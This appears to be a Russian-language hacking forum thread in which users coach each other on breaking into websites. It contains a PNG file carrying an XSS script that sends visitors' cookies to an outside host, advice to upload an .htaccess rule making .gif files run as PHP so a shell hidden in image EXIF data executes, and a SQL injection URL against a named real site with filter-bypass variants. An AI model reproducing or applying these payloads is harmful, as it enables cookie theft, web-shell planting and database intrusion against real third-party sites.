txt, php, gif, jpg, xls, mdb, csv, rar, zip, css, doc, chm, pdf

Что сейчас можно сделать чтобы снова доступ получить? И что вообще холдер сделал?

prozorov, Залей какой-нить скрипт для работы с бд на пхп и проверь работает ли, и просто <? echo 'henk'; ?>, и напиши результаты.

к примеру мог в папку куда все льется положить хтакцес с php_flag engine off

prozorov, Залей какой-нить скрипт для работы с бд на пхп и проверь работает ли, и просто <? echo 'henk'; ?>, и напиши результаты.


подходящих скриптов не нашел, но вроде обрабатывает
<? echo 'henk'; ?> тоже обрабатывает

хтакцес с php_flag engine off

может быть, я проверил все папки- результат один

кста, на сайте форум был, тоже работать перестал

нашел xss на сайте залив картинку png c таким содержанием

‰PNG  IHDR

 Д‰
sRGB ®Ой gAMA ±Џьa cHRM z& Ђ„ ъ Ђи u0 к` :˜ pњєQ< pHYs  
љњ IDATWcш ыэ+ХE IEND®B`‚<html> <script>alert(/by_blabla_/)</script><script>img = new Image(); img.src = "http://s.netsec.ru/absent09.gif?"+document.cookie;</script> </html> z& Ђ„ ъ Ђи u0 к` :˜ pњєQ< pHYs  
љњ IDATWcш ыэ+ХE IEND®B`‚

напрашивается вопрос можно ли вставить шелл вместо <html> <script>alert(/by_blabal_/)</script><script>img = new Image(); img.src = "http://s.netsec.ru/absent09.gif?"+document.cookie;</script> </html> ?

я вставляю вместо этого код шелла а когда запускаю такое чувство будто php не работает =(

нет, xss выполняется на стороне клиента. пхп код который ты вставляешь тоже только показывается юзеру, но не выполняется на самом сервере

подходящих скриптов не нашел, но вроде обрабатывает
<? echo 'henk'; ?> тоже обрабатывает

хтакцес с php_flag engine off

может быть, я проверил все папки- результат один

кста, на сайте форум был, тоже работать перестал

prozorov у тя safe mode on скорее всего с safe_mode_gid(on)

to MSDEN

по пробуй залить это

<Files "s.gif">
AddType application/x-httpd-php .gif
</Files>

и залить картинку с шеллом.

gibson, я в этом чуть чуть чайнег
<Files "s.gif">
AddType application/x-httpd-php .gif
</Files> залить в виде чего? как второй файл чтоли?
а какртинку с шеллом как залить? просто у шелла разрешение поменять?
если нетрудно дай аську ;)

<Files "s.gif">
AddType application/x-httpd-php .gif
</Files>
это текст в файле .htaccess (тип настройка в апаче). Этот файл говорит апачу, чтобы расшширение ГИФ он воспринимал как скрипт.

Как залить? ЕСли у тя там проверка тока по расширению, то поменяй просто расширение. а если по типу, то допиши шелл в конец картинки. (ну например в свойствах в поле exif впиши)

prozorov, в каком плане обрабатываеца? Работает или нет? я про echo.

prozorov, в каком плане обрабатываеца? Работает или нет? я про echo.

работает, на страницу вывелось henk

prozorov, _ttp://webfile.ru/1810388

Попорбуй этот скрипт запустить

prozorov, _ttp://webfile.ru/1810388

Попорбуй этот скрипт запустить

спс,
скрипт работает, но конеекта нет

нашел инъекцию, знаю таблицы,поля и т.п., на
1,version(),3/* отвечает положительно, но если добавить from то сразу вылетает ошибка что скрипт небезопасный,т.е. фильтруют. как решить?hex ?

2 bad
FroM
%66%72%6f%6d
%25%36%36%25%37%32%25%36%46%25%36%44
f/**/r/**/o/**/m
Варианты from ,но может и не проскочить

http://shlahter.ru/index.php?showfile=1&fid=7&p=downloads&area=1&categ=-1+union+select+1,version(),3/*
таблица koobi4_user или kpro_user не получ все таки

bag тебе сюда
_https://forum.antichat.ru/thread56409-sweb.html

sweb фильтрует все млин:(

как отправить пост вместо гет?